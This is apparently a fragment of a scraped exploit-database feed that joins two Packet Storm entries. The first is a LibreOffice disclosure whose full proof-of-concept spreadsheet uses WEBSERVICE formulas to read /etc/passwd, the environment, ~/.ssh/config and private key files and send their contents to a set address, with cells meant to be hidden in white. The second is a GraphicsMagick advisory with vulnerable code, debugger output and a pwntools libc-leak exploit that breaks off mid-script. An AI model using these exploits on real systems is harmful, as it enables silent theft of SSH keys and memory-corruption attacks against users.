FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\", \n \nAlso you can parse other files too, like a ~/.ssh/config or something like that. \n \nFor other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works). \n \n# Impact \n \nIt is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, support all modern versions of LibreOffice and may be embedded in almost all formats supporting by LO. 
\n \n \n \npoc.fods: \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n \n<office:document xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\" xmlns:style=\"urn:oasis:names:tc:opendocument:xmlns:style:1.0\" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\" xmlns:table=\"urn:oasis:names:tc:opendocument:xmlns:table:1.0\" xmlns:draw=\"urn:oasis:names:tc:opendocument:xmlns:drawing:1.0\" xmlns:fo=\"urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:meta=\"urn:oasis:names:tc:opendocument:xmlns:meta:1.0\" xmlns:number=\"urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0\" xmlns:presentation=\"urn:oasis:names:tc:opendocument:xmlns:presentation:1.0\" xmlns:svg=\"urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0\" xmlns:chart=\"urn:oasis:names:tc:opendocument:xmlns:chart:1.0\" xmlns:dr3d=\"urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0\" xmlns:math=\"http://www.w3.org/1998/Math/MathML\" xmlns:form=\"urn:oasis:names:tc:opendocument:xmlns:form:1.0\" xmlns:script=\"urn:oasis:names:tc:opendocument:xmlns:script:1.0\" xmlns:config=\"urn:oasis:names:tc:opendocument:xmlns:config:1.0\" xmlns:ooo=\"http://openoffice.org/2004/office\" xmlns:ooow=\"http://openoffice.org/2004/writer\" xmlns:oooc=\"http://openoffice.org/2004/calc\" xmlns:dom=\"http://www.w3.org/2001/xml-events\" xmlns:xforms=\"http://www.w3.org/2002/xforms\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:rpt=\"http://openoffice.org/2005/report\" xmlns:of=\"urn:oasis:names:tc:opendocument:xmlns:of:1.2\" xmlns:xhtml=\"http://www.w3.org/1999/xhtml\" xmlns:grddl=\"http://www.w3.org/2003/g/data-view#\" xmlns:tableooo=\"http://openoffice.org/2009/table\" xmlns:drawooo=\"http://openoffice.org/2010/draw\" xmlns:calcext=\"urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0\" 
xmlns:loext=\"urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0\" xmlns:field=\"urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0\" xmlns:formx=\"urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0\" xmlns:css3t=\"http://www.w3.org/TR/css3-text/\" office:version=\"1.2\" office:mimetype=\"application/vnd.oasis.opendocument.spreadsheet\"> \n<office:automatic-styles> \n<style:style style:name=\"co1\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"73.3pt\"/> \n</style:style> \n<style:style style:name=\"co2\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"75.66pt\"/> \n</style:style> \n<style:style style:name=\"co3\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"173.14pt\"/> \n</style:style> \n<style:style style:name=\"co4\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"64.01pt\"/> \n</style:style> \n<style:style style:name=\"co5\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"420.94pt\"/> \n</style:style> \n<style:style style:name=\"co6\" style:family=\"table-column\"> \n<style:table-column-properties fo:break-before=\"auto\" style:column-width=\"105.19pt\"/> \n</style:style> \n<style:style style:name=\"ro1\" style:family=\"table-row\"> \n<style:table-row-properties style:row-height=\"12.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/> \n</style:style> \n<style:style style:name=\"ro2\" style:family=\"table-row\"> \n<style:table-row-properties style:row-height=\"126.74pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"false\"/> \n</style:style> \n<style:style style:name=\"ro3\" style:family=\"table-row\"> \n<style:table-row-properties style:row-height=\"135.81pt\" 
fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/> \n</style:style> \n<style:style style:name=\"ta1\" style:family=\"table\" style:master-page-name=\"Default\"> \n<style:table-properties table:display=\"true\" style:writing-mode=\"lr-tb\"/> \n</style:style> \n<style:style style:name=\"ce1\" style:family=\"table-cell\" style:parent-style-name=\"Default\" style:data-style-name=\"N0\"/> \n<style:style style:name=\"ce2\" style:family=\"table-cell\" style:parent-style-name=\"Default\"> \n<style:text-properties style:use-window-font-color=\"true\"/> \n</style:style> \n<style:style style:name=\"ce5\" style:family=\"table-cell\" style:parent-style-name=\"Default\"> \n<style:table-cell-properties fo:background-color=\"#f3715a\"/> \n</style:style> \n<style:page-layout style:name=\"pm1\"> \n<style:page-layout-properties style:writing-mode=\"lr-tb\"/> \n<style:header-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\"/> \n</style:header-style> \n<style:footer-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\"/> \n</style:footer-style> \n</style:page-layout> \n<style:page-layout style:name=\"pm2\"> \n<style:page-layout-properties style:writing-mode=\"lr-tb\"/> \n<style:header-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\"> \n<style:background-image/> \n</style:header-footer-properties> \n</style:header-style> \n<style:footer-style> \n<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\"> \n<style:background-image/> 
\n</style:header-footer-properties> \n</style:footer-style> \n</style:page-layout> \n</office:automatic-styles> \n<office:body> \n<office:spreadsheet> \n<table:calculation-settings table:automatic-find-labels=\"false\" table:use-regular-expressions=\"false\" table:use-wildcards=\"true\"/> \n<table:table table:name=\"Sheet1\" table:style-name=\"ta1\"> \n<table:table-column table:style-name=\"co1\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co2\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co3\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co5\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/> \n<table:table-column table:style-name=\"co6\" table:default-cell-style-name=\"Default\"/> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"8\"/> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell table:number-columns-repeated=\"9\"/> \n</table:table-row> \n<table:table-row table:style-name=\"ro2\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>Current user:</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce1\" table:formula=\"of:=\"/home/\" & MID(COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")) + LEN(\"USER=\"); SEARCH(CHAR(0); 
COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"))-LEN(\"USER=\")) & \"/\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\":\"; [.F3]; [.E3])\" office:value-type=\"float\" office:value=\"689\" calcext:value-type=\"float\"> \n<text:p>689</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\"/home\"; [.F3]; FIND(\":x:1000:1000:\"; [.F3]))\" office:value-type=\"float\" office:value=\"676\" calcext:value-type=\"float\"> \n<text:p>676</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce2\" table:formula=\"of:=COM.MICROSOFT.WEBSERVICE(\"/etc/passwd\")\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell/> \n<table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"><text:p>(change this)</text:p><text:p>Address:</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>http://localhost:8080</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro3\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>List of private keys:</text:p> \n</table:table-cell> \n<table:table-cell table:style-name=\"ce1\"/> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & \"/.ssh/config\"); \"~\"; [.C3])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> 
\n</table:table-cell> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>Send:</text:p> \n</table:table-cell> \n<table:table-cell/> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"string\" calcext:value-type=\"string\"> \n<text:p>0 (default path)</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.C3] & \"/.ssh/id_rsa\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"5\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C5]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"1\" calcext:value-type=\"float\"> \n<text:p>1</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F6])\" office:value-type=\"float\" office:value=\"132\" calcext:value-type=\"float\"> \n<text:p>132</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F6]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"109\" calcext:value-type=\"float\"> \n<text:p>109</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.F4])\" office:value-type=\"float\" office:value=\"96\" calcext:value-type=\"float\"> \n<text:p>96</text:p> \n</table:table-cell> \n<table:table-cell 
table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C6]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"2\" calcext:value-type=\"float\"> \n<text:p>2</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F7])\" office:value-type=\"float\" office:value=\"297\" calcext:value-type=\"float\"> \n<text:p>297</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F7]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"259\" calcext:value-type=\"float\"> \n<text:p>259</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F6];1))\" office:value-type=\"float\" office:value=\"246\" calcext:value-type=\"float\"> \n<text:p>246</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C7]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"3\" calcext:value-type=\"float\"> \n<text:p>3</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])\" office:value-type=\"string\" office:string-value=\"\" 
calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F8])\" office:value-type=\"float\" office:value=\"436\" calcext:value-type=\"float\"> \n<text:p>436</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F8]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"409\" calcext:value-type=\"float\"> \n<text:p>409</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F7];1))\" office:value-type=\"float\" office:value=\"396\" calcext:value-type=\"float\"> \n<text:p>396</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C8]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"4\" calcext:value-type=\"float\"> \n<text:p>4</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F9])\" office:value-type=\"float\" office:value=\"586\" calcext:value-type=\"float\"> \n<text:p>586</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F9]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"563\" calcext:value-type=\"float\"> \n<text:p>563</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F8];1))\" office:value-type=\"float\" office:value=\"550\" calcext:value-type=\"float\"> 
\n<text:p>550</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C9]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"5\" calcext:value-type=\"float\"> \n<text:p>5</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F10])\" office:value-type=\"float\" office:value=\"718\" calcext:value-type=\"float\"> \n<text:p>718</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F10]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"695\" calcext:value-type=\"float\"> \n<text:p>695</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F9];1))\" office:value-type=\"float\" office:value=\"682\" calcext:value-type=\"float\"> \n<text:p>682</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C10]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"6\" calcext:value-type=\"float\"> \n<text:p>6</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; 
[.E11]; [.D11]-[.E11])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F11])\" office:value-type=\"float\" office:value=\"882\" calcext:value-type=\"float\"> \n<text:p>882</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F11]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"860\" calcext:value-type=\"float\"> \n<text:p>860</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F10];1))\" office:value-type=\"float\" office:value=\"847\" calcext:value-type=\"float\"> \n<text:p>847</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C11]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"7\" calcext:value-type=\"float\"> \n<text:p>7</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F12])\" office:value-type=\"float\" office:value=\"1267\" calcext:value-type=\"float\"> \n<text:p>1267</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F12]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1240\" calcext:value-type=\"float\"> \n<text:p>1240</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F11];1))\" 
office:value-type=\"float\" office:value=\"1227\" calcext:value-type=\"float\"> \n<text:p>1227</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C12]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"8\" calcext:value-type=\"float\"> \n<text:p>8</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F13])\" office:value-type=\"float\" office:value=\"1408\" calcext:value-type=\"float\"> \n<text:p>1408</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F13]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1383\" calcext:value-type=\"float\"> \n<text:p>1383</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F12];1))\" office:value-type=\"float\" office:value=\"1370\" calcext:value-type=\"float\"> \n<text:p>1370</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C13]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n<table:table-row table:style-name=\"ro1\"> \n<table:table-cell/> \n<table:table-cell office:value-type=\"float\" office:value=\"9\" calcext:value-type=\"float\"> 
\n<text:p>9</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\"> \n<text:p></text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F14])\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=[.F14]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F13];1))\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n<table:table-cell table:number-columns-repeated=\"2\"/> \n<table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C14]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\"> \n<text:p>#VALUE!</text:p> \n</table:table-cell> \n</table:table-row> \n</table:table> \n<table:named-expressions/> \n</office:spreadsheet> \n</office:body> \n</office:document> \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146319/libreoffice-disclose.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-11-05T20:00:04", "bulletinFamily": "exploit", "description": "", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://packetstormsecurity.com/files/144878/GraphicsMagick-Memory-Disclosure-Heap-Overflow.html", "id": "PACKETSTORM:144878", "title": "GraphicsMagick Memory Disclosure / Heap Overflow", "type": "packetstorm", "sourceData": "`'''Vulnerabilities summary \nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick. 
\n \nGraphicsMagick is \"The swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler's SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\" \n \nThe vulnerabilities found are: \n \nMemory Information Disclosure \nHeap Overflow \nCredit \nIndependent security researchers Jeremy Heng (@nn_amon) and Terry Chia (Ayrx) reported these vulnerabilities to Beyond Security's SecuriTeam Secure Disclosure program. \n \nVendor response \nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18). \n \nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt \n \n \nVulnerability details \n \nMemory Information Disclosure \nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in the DescribeImage function of the magick/describe.c file. \n \nThe portion of the code containing the vulnerability is responsible for printing the IPTC Profile information contained in the image. \n \nThis vulnerability can be triggered with a specially crafted MIFF file. \n \nThe code which triggers the vulnerable code path is: \n \n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file, \n64 const MagickBool verbose) \n65 { \n... \n660 for (i=0; i < profile_length; ) \n661 { \n662 if (profile[i] != 0x1c) \n663 { \n664 i++; \n665 continue; \n666 } \n667 i++; /* skip file separator */ \n668 i++; /* skip record number */ \n... 
\n725 i++; \n726 (void) fprintf(file,\" %.1024s:\\n\",tag); \n727 length=profile[i++] << 8; \n728 length|=profile[i++]; \n729 text=MagickAllocateMemory(char *,length+1); \n730 if (text != (char *) NULL) \n731 { \n732 char \n733 **textlist; \n734 \n735 register unsigned long \n736 j; \n737 \n738 (void) strncpy(text,(char *) profile+i,length); \n739 text[length]='\\0'; \n740 textlist=StringToList(text); \n741 if (textlist != (char **) NULL) \n742 { \n743 for (j=0; textlist[j] != (char *) NULL; j++) \n744 { \n745 (void) fprintf(file,\" %s\\n\",textlist[j]); \n... \n752 i+=length; \n753 } \n \n \nThe value of the profile_length variable is set by the following field in the MIFF header: profile-iptc=8 \n \nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i are never checked against profile_length. \n \nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation. \n \n \ngef➤ x/2xg profile \n0x8be210: 0x08000a001c414141 0x00007ffff690fba8 \n \n \nThe 8 bytes 0x08000a001c414141 are the profile payload present in the specially crafted MIFF file. \n \n \n41 41 41 - padding \n1C - sentinel check in line 662 \n00 - padding \n0A - \"Priority\" tag \n08 00 - 8 in big endian, the length \n \n \nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc. \n \n \ngef➤ x/xw 0x00007ffff690fba8 \n0x7ffff690fba8 <main_arena+136>: 0x008cdc40 \ngef➤ 
vmmap libc \nStart End Offset Perm Path \n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 --- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r-- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw- \n/lib/x86_64-linux-gnu/libc-2.23.so \n \nNow we can calculate the offset to the libc base: 0x3c4b98 \n \nProof of Concept \n \n$ python miff/readexploit.py \n[+] Starting local process '/usr/bin/gm': pid 20019 \n[+] Receiving all data: Done (1.27KB) \n[*] Process '/usr/bin/gm' stopped with exit code 0 (pid 20019) \n[*] Main Arena Leak: 0x7f72948adb98 \n[*] libc Base: 0x7f72944e9000 \n \n#!/usr/bin/python \n# GraphicsMagick IPTC Profile libc Leak \n \nfrom pwn import * \n \ndirectory = \"DIR\" \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' + \n'e-iptc=', \n'\\n\\x0c\\n:\\x1a', \n'\\n\\x00', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"readexploit.miff\" \nlength = 8 \n \n#libc_main_arena_entry_offset = 0x3c4ba8 \nlibc_main_arena_entry_offset = 0x3c4b98 \n \ndef main(): \ndata = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\") \nheader = partitions[0] + str(length) + partitions[1] \npayload = header + directory + partitions[2] + data + partitions[3] \nfile(output, \"w\").write(payload) \n \np = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output]) \noutput_leak = p.recvall() \npriority_offset = output_leak.index(\"Priority:\") + 12 \nmontage_offset = output_leak.index(\"Montage:\") - 3 \nleak = output_leak[priority_offset:montage_offset] \nif \"0x00000000\" in leak: \nlog.info(\"Unlucky run. 
